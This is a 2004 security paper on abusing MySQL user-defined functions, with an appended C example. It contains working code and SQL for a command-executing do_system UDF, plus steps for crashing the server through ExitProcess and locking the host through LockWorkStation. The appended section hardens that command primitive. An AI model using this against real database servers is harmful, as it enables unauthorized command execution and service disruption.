MySQL user-defined functions (UDFs) on Linux
Chris Anley [chris@ngssoftware.com], 5th July 2004

MySQL's family of built-in functions is extensible: you can build a dynamic library containing user-defined functions and register them with CREATE FUNCTION (the short name for this mechanism is "UDF"). Every registered function is recorded in the mysql.func table, and the server loads the libraries listed there with the dynamic loader, so a library file must sit where that loader can find it (on the MySQL versions of the time a standard library directory such as /usr/lib; later versions load UDFs only from plugin_dir).

An attacker abuses this mechanism by writing a malicious library of their own into a directory the server can reach, using SELECT ... INTO OUTFILE (this needs the FILE privilege; INTO DUMPFILE is the variant that writes a single row byte-for-byte, without the escaping OUTFILE applies to binary content). Once the file is in place, the attacker either runs CREATE FUNCTION or inserts a row directly into mysql.func (INSERT privilege on the mysql database), after which the server loads the library and executes the function on demand.

Here is a fairly trivial example of a UDF library (the original apologises for its lack of elegance):

#include <stdio.h>
#include <stdlib.h>

/* compile with something like

   gcc -g -c so_system.c

   then

   gcc -g -shared -Wl,-soname,so_system.so.0 -o so_system.so.0.0 so_system.o -lc

   These definitions mirror MySQL's UDF interface so the example builds without
   the MySQL headers; a real build would include mysql.h instead. */

enum Item_result { STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT };

typedef struct st_udf_args
{
    unsigned int arg_count;         /* Number of arguments */
    enum Item_result *arg_type;     /* Pointer to item_results */
    char **args;                    /* Pointer to argument */
    unsigned long *lengths;         /* Length of string arguments */
    char *maybe_null;               /* Set to 1 for all maybe_null args */
} UDF_ARGS;

typedef struct st_udf_init
{
    char maybe_null;                /* 1 if function can return NULL */
    unsigned int decimals;          /* for real functions */
    unsigned long max_length;       /* For string functions */
    char *ptr;                      /* free pointer for function data */
    char const_item;                /* 0 if result is independent of arguments */
} UDF_INIT;

/* MySQL expects an integer UDF to return long long; this draft returns int,
   which is why the SELECT below shows a garbage value (the command still runs). */
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    if (args->arg_count != 1)
        return 0;

    system(args->args[0]);

    return 0;
}

Add the function like this:

mysql> create function do_system returns integer soname 'so_system.so';
Query OK, 0 rows affected (0.00 sec)

The mysql.func table now looks like the following (you can of course also modify it directly with INSERT or UPDATE):

mysql> select * from mysql.func;
+-----------+-----+--------------+----------+
| name      | ret | dl           | type     |
+-----------+-----+--------------+----------+
| do_system |   2 | so_system.so | function |
+-----------+-----+--------------+----------+
1 row in set (0.00 sec)

Call the function:

mysql> select do_system('ls > /tmp/test.txt');
+---------------------------------+
| do_system('ls > /tmp/test.txt') |
+---------------------------------+
|            -4665733612002344960 |
+---------------------------------+
1 row in set (0.02 sec)

Even where file permissions do not let us drop a dynamic library of our own onto the target, functions already present in existing libraries can still be put to malicious use. The obstacle for the attacker is that their parameter lists do not match the MySQL UDF prototype:

int xxx(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)

A sophisticated attacker might find a function in an existing library whose behaviour, when handed these arguments, can be controlled well enough to execute arbitrary code, but that remains difficult. It is nonetheless possible to do "bad" things through functions in existing libraries, because MySQL resolves the named symbol and simply calls it with its own four arguments. For example, on Windows you can register ExitProcess from kernel32 as a MySQL UDF; calling it terminates the server immediately, even from an account that has no SHUTDOWN privilege in MySQL (ExitProcess reads one UINT, so the exit code is whatever lands in the first parameter, here the initid pointer).
mysql> create function ExitProcess returns integer soname 'kernel32';
Query OK, 0 rows affected (0.17 sec)

mysql> select exitprocess();
ERROR 2013: Lost connection to MySQL server during query

You can also lock the logon session of the workstation the server is running on (the same effect as choosing Lock Workstation from the Ctrl+Alt+Del screen), since LockWorkStation in user32 takes no arguments at all and ignores whatever MySQL passes it:

mysql> create function LockWorkStation returns integer soname 'user32';
Query OK, 0 rows affected (0.00 sec)

mysql> select LockWorkStation();
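The following is an added example, not code from the paper, and it covers both the so_system library above and the prototype mismatch just described. It gives do_system the shape the server actually expects (a do_system_init that validates the argument list, a long long result, and a NUL-terminated copy made from args->lengths rather than trusting the bytes to be terminated), and it adds a stand-in for the server's resolve-and-call path to show what a one-argument export such as ExitProcess receives when it is invoked as a UDF. The UDF_INIT and UDF_ARGS definitions are copied from the page (a real build includes mysql.h instead); call_as_udf, the exports table and fake_exit_process are assumptions of this example standing in for dlsym()/GetProcAddress() and the Win32 export, and they record instead of exiting.

```c
/* udf_demo.c: do_system written to the prototypes MySQL expects, plus a stand-in for the
 * server's resolve-and-call path. Added example; build: gcc -Wall -o udf_demo udf_demo.c */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>

#define MYSQL_ERRMSG_SIZE 512           /* size of the init() message buffer, as in mysql_com.h */
typedef char my_bool;
enum Item_result { STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT };
typedef struct st_udf_args {            /* interface types as on the page; real builds use mysql.h */
    unsigned int arg_count; enum Item_result *arg_type;
    char **args;                        /* string values are NOT guaranteed NUL-terminated */
    unsigned long *lengths; char *maybe_null;
} UDF_ARGS;
typedef struct st_udf_init {
    char maybe_null; unsigned int decimals; unsigned long max_length;
    char *ptr; char const_item;
} UDF_INIT;

/* Runs once per statement; a non-zero return refuses the call, so do_system() itself
 * never sees a wrong arg_count. The page's draft has no init function at all. */
my_bool do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message) {
    if (args->arg_count != 1 || args->arg_type[0] != STRING_RESULT) {
        strncpy(message, "do_system() takes exactly one string argument", MYSQL_ERRMSG_SIZE - 1);
        message[MYSQL_ERRMSG_SIZE - 1] = '\0';
        return 1;
    }
    initid->maybe_null = 1;
    return 0;
}

/* Integer UDFs return long long; the page's draft returns int, which leaves the upper
 * half of the result undefined (hence the garbage value in the paper's SELECT output). */
long long do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) {
    (void)initid; if (args->args[0] == NULL) { *is_null = 1; return 0; }
    size_t len = args->lengths[0];      /* use the length the server gives, never strlen() */
    char *cmd = malloc(len + 1);
    if (cmd == NULL) { *error = 1; return 0; }
    memcpy(cmd, args->args[0], len);
    cmd[len] = '\0';
    int status = system(cmd);           /* a shell, deliberately: this is the attack primitive */
    free(cmd);
    if (status == -1) { *error = 1; return 0; }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The server invokes every integer UDF through this prototype, whatever the symbol really is. */
typedef long long (*udf_int_fn)(UDF_INIT *, UDF_ARGS *, char *, char *);
typedef void (*generic_fn)(void);

/* Harmless stand-in shaped like ExitProcess(UINT): one integer parameter, records instead of exiting. */
static unsigned int captured_exit_code;
static void fake_exit_process(unsigned int code) { captured_exit_code = code; }

/* Export table standing in for dlsym()/GetProcAddress(): the server resolves by name only. */
static const struct { const char *name; generic_fn addr; } exports[] = {
    { "do_system", (generic_fn)do_system }, { "ExitProcess", (generic_fn)fake_exit_process } };

/* Resolve a name and call it through the UDF prototype, as the server does. -1: not found. */
static long long call_as_udf(const char *name, UDF_INIT *initid, UDF_ARGS *args,
                             char *is_null, char *error) {
    for (size_t i = 0; i < sizeof exports / sizeof exports[0]; i++)
        if (strcmp(exports[i].name, name) == 0) {
            volatile udf_int_fn fn = (udf_int_fn)exports[i].addr;   /* volatile keeps the indirect call */
            return fn(initid, args, is_null, error);
        }
    return -1;
}

/* init -> call for do_system with one string argument given as (pointer, length), so bytes
 * past len never become part of the command. Returns the exit status; -2 if init refused. */
long long run_do_system(const char *buf, unsigned long len) {
    UDF_INIT initid = {0};
    enum Item_result type = STRING_RESULT;
    char *argv[1] = { (char *)buf };
    unsigned long lens[1] = { len }; char nulls[1] = { 0 };
    UDF_ARGS args = { 1, &type, argv, lens, nulls };
    char msg[MYSQL_ERRMSG_SIZE], is_null = 0, error = 0;
    if (do_system_init(&initid, &args, msg)) return -2;
    long long r = call_as_udf("do_system", &initid, &args, &is_null, &error);
    return error ? -3 : r;
}

/* 1 if init refuses a two-argument call. */
int init_rejects_two_args(void) {
    UDF_INIT initid = {0};
    enum Item_result types[2] = { STRING_RESULT, STRING_RESULT };
    UDF_ARGS args = { 2, types, NULL, NULL, NULL };
    char msg[MYSQL_ERRMSG_SIZE];
    return do_system_init(&initid, &args, msg) != 0;
}

/* 1 if the one-argument export received the low bits of the initid pointer as its "exit code":
 * the server's first argument lands in the callee's first parameter, which is all ExitProcess reads. */
int exit_process_gets_initid(void) {
    UDF_INIT initid = {0}; UDF_ARGS args = {0}; char is_null = 0, error = 0;
    call_as_udf("ExitProcess", &initid, &args, &is_null, &error);
    return captured_exit_code == (unsigned int)(uintptr_t)&initid;
}

int main(void) {
    printf("do_system('exit 3') -> %lld; init rejects two args: %d; ExitProcess got initid: %d\n",
           run_do_system("exit 3 junk", 6), init_rejects_two_args(), exit_process_gets_initid());
    return 0;
}
```

run_do_system passes "exit 3 junk" with a length of 6, so the trailing bytes never reach the shell and the call returns the status 3 that /bin/sh exits with; a version that did strlen() on args->args[0] would have run the whole buffer. Calling a symbol through a prototype it was not written for is undefined behaviour in C, which is exactly why it works for the attacker: on every common calling convention the first argument slot holds initid, so ExitProcess exits with its low bits, and a zero-argument export such as LockWorkStation runs and ignores all four.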